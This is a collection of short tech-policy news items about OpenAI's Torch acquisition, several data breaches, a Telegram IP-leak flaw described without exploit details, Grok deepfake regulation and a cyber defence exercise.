OpenAI expands healthcare strategy with Torch acquisition

The US AI company, OpenAI, has acquired healthcare technology startup Torch only days after unveiling ChatGPT Health, signalling an accelerated push into medical and clinical applications.

Financial terms were not officially disclosed, although media reports estimate the transaction at between $60 million and $100 million.

Torch was developed as a unified medical memory platform, designed to consolidate patient data from hospitals, laboratories, wearable devices and consumer testing services.

The company positioned its technology as a means to support AI systems in navigating fragmented healthcare information, rather than relying on isolated data sources.

Torch’s four-person team will join OpenAI following the acquisition, reinforcing the company’s internal healthcare expertise. OpenAI has emphasised privacy, safety and collaboration with medical professionals as core principles guiding its expansion into sensitive data environments.

The move follows a broader strategy by OpenAI to strengthen enterprise offerings, particularly for large healthcare organisations. Recent hires and partnerships suggest healthcare remains a priority area as AI adoption increases across regulated sectors.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Government IT vulnerabilities revealed by UK public sector cyberattack

A UK public sector cyberattack on Kensington and Chelsea Council has exposed the growing vulnerability of government organisations to data breaches. The council stated that personal details linked to hundreds of thousands of residents may have been compromised after attackers targeted the shared IT infrastructure.

Security experts warn that interconnected systems, while cost-efficient, create systemic risks. Dray Agha, senior manager of security operations at Huntress, said a single breach can quickly spread across partner organisations, disrupting essential services and exposing sensitive information.

Public sector bodies remain attractive targets due to ageing infrastructure and the volume of personal data they hold. Records such as names, addresses, national ID numbers, health information, and login credentials can be exploited for fraud, identity theft, and large-scale scams.

Gregg Hardie, public sector regional vice president at SailPoint, noted that attackers often employ simple, high-volume tactics rather than sophisticated techniques. Compromised credentials allow criminals to blend into regular activity and remain undetected for long periods before launching disruptive attacks.

Hardie said stronger identity security and continuous monitoring are essential to prevent minor intrusions from escalating. Investing in resilient, segmented systems could help reduce the impact of future UK public sector cyberattack incidents and protect critical operations.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

One-click vulnerability in Telegram bypasses VPN and proxy protection

A newly identified vulnerability in Telegram’s mobile apps allows attackers to reveal users’ real IP addresses with a single click. The flaw, known as a ‘one-click IP leak’, can expose location and network details even when VPNs or proxies are enabled.

The issue comes from Telegram’s automatic proxy testing process. When a user clicks a disguised proxy link, the app initiates a direct connection request that bypasses all privacy protections and reveals the device’s real IP address.

Cybersecurity researcher @0x6rss demonstrated an attack on X, showing that a single click is enough to log a victim’s real IP address. The request behaves similarly to known Windows NTLM leaks, where background authentication attempts expose identifying information without explicit user consent.

Attackers can embed malicious proxy links in chats or channels, masking them as standard usernames. Once clicked, Telegram silently runs the proxy test, bypasses VPN or SOCKS5 protections, and sends the device’s real IP address to the attacker’s server, enabling tracking, surveillance, or doxxing.

Both Android and iOS versions are affected, putting millions of privacy-focused users at risk. Researchers recommend avoiding unknown links, turning off automatic proxy detection where possible, and using firewall tools to block outbound proxy tests. Telegram has not publicly confirmed a fix.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Betterment confirms data breach after social engineering attack

Fintech investment platform Betterment has confirmed a data breach after hackers gained unauthorised access to parts of its internal systems and exposed personal customer information.

The incident occurred on 9 January and involved a social engineering attack connected to third-party platforms used for marketing and operational purposes.

The company said the compromised data included customer names, email and postal addresses, phone numbers and dates of birth.

No passwords or account login credentials were accessed, according to Betterment, which stressed that customer investment accounts were not breached.

Using the limited system access, attackers sent fraudulent notifications to some users promoting a crypto-related scam.

Customers were advised to ignore the messages instead of engaging with the request, while Betterment moved quickly to revoke the unauthorised access and begin a formal investigation with external cybersecurity support.

Betterment has not disclosed how many users were affected and has yet to provide further technical details. Representatives did not respond to requests for comment at the time of publication, while the company said outreach to impacted customers remains ongoing.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Australia raises concerns over AI misuse on X

The eSafety regulator in Australia has expressed concern over the misuse of the generative AI system Grok on social media platform X, following reports involving sexualised or exploitative content, particularly affecting children.

Although overall report numbers remain low, authorities in Australia have observed a recent increase over the past weeks.

The regulator confirmed that enforcement powers under the Online Safety Act remain available where content meets defined legal thresholds.

X and other services are subject to systemic obligations requiring the detection and removal of child sexual exploitation material, alongside broader industry codes and safety standards.

eSafety has formally requested further information from X regarding safeguards designed to prevent misuse of generative AI features and to ensure compliance with existing obligations.

Previous enforcement actions taken in 2025 against similar AI services resulted in their withdrawal from the Australian market.

Additional mandatory safety codes will take effect in March 2026, introducing new obligations for AI services to limit children’s exposure to sexually explicit, violent and self-harm-related material.

Authorities emphasised the importance of Safety by Design measures and continued international cooperation among online safety regulators.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Teen victim turns deepfake experience into education

A US teenager targeted by explicit deepfake images has helped create a new training course. The programme aims to support students, parents and school staff facing online abuse.

The course explains how AI tools are used to create sexualised fake images. It also outlines legal rights, reporting steps and available victim support resources.

Research shows deepfake abuse is spreading among teenagers, despite stronger laws. One in eight US teens know someone targeted by non-consensual fake images.

Developers say education remains critical as AI tools become easier to access. Schools are encouraged to adopt training to protect students and prevent harm.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot

Patients notified months after Canopy Healthcare cyber incident

Canopy Healthcare, one of New Zealand’s largest private medical oncology providers, has disclosed a data breach affecting patient and staff information, six months after the incident occurred.

The company said an unauthorised party accessed part of its administration systems on 18 July 2025, copying a ‘small’ amount of data. Affected information may include patient records, passport details, and some bank account numbers.

Canopy said it remains unclear exactly which individuals were impacted and what data was taken, adding that no evidence has emerged of the information being shared or published online.

Patients began receiving notifications in December 2025, prompting criticism over the delay. One affected patient said they were unhappy to learn about the breach months after it happened.

The New Zealand company said it notified police and the Privacy Commissioner at the time, secured a High Court injunction to prevent misuse of the data, and confirmed that its medical services continue to operate normally.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Cyber Fortress strengthens European cyber resilience

Luxembourg has hosted its largest national cyber defence exercise, Cyber Fortress, bringing together military and civilian specialists to practise responding to real-time cyberattacks on digital systems.

Since its launch in 2021, Cyber Fortress has evolved beyond a purely technical drill. The exercise now includes a realistic fictional scenario supported by media injections, creating a more immersive and practical training environment for participants.

This year’s edition expanded its international reach, with teams joining from Belgium, Latvia, Malta and the EU Cyber Rapid Response Teams. Around 100 participants also took part from a parallel site in Latvia, working alongside Luxembourg-based teams.

The exercise focuses on interoperability during cyber crises. Participants respond to multiple simulated attacks while protecting critical services, including systems linked to drone operations and other sensitive infrastructure.

Cyber Fortress now covers technical, procedural and management aspects of cyber defence. A new emphasis on disinformation, deepfakes and fake news reflects the growing importance of information warfare.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

UK considers regulatory action after Grok’s deepfake images on X

UK Prime Minister Keir Starmer is consulting Canada and Australia on a coordinated response to concerns surrounding social media platform X, after its AI assistant Grok was used to generate sexualised deepfake images of women and children.

The discussions focus on shared regulatory approaches rather than immediate bans.

X acknowledged weaknesses in its AI safeguards and limited image generation to paying users. Lawmakers in several countries have stated that further regulatory scrutiny may be required, while Canada has clarified that no prohibition is currently under consideration, despite concerns over platform responsibility.

In the UK, media regulator Ofcom is examining potential breaches of online safety obligations. Technology secretary Liz Kendall confirmed that enforcement mechanisms remain available if legal requirements are not met.

Australian Prime Minister Anthony Albanese also raised broader concerns about social responsibility in the use of generative AI.

X owner Elon Musk rejected accusations of non-compliance, describing potential restrictions as censorship and suppression of free speech.

European authorities requested the preservation of internal records for possible investigations, while Indonesia and Malaysia have already blocked access to the platform.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Indonesia and Malaysia restrict access to Grok AI over content safeguards

Malaysia and Indonesia have restricted access to Grok, the AI chatbot available through the X platform, following concerns about its image generation capabilities.

Authorities said the tool had been used to create manipulated images depicting real individuals in sexually explicit contexts.

Regulatory bodies in Malaysia and Indonesia stated that the decision was based on the absence of sufficient safeguards to prevent misuse.

Requests for additional risk mitigation measures were communicated to the platform operator, with access expected to remain limited until further protections are introduced.

The move has drawn attention from regulators in other regions, where online safety frameworks allow intervention when digital services fail to address harmful content. Discussions have focused on platform responsibility, content moderation standards, and compliance with existing legal obligations.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!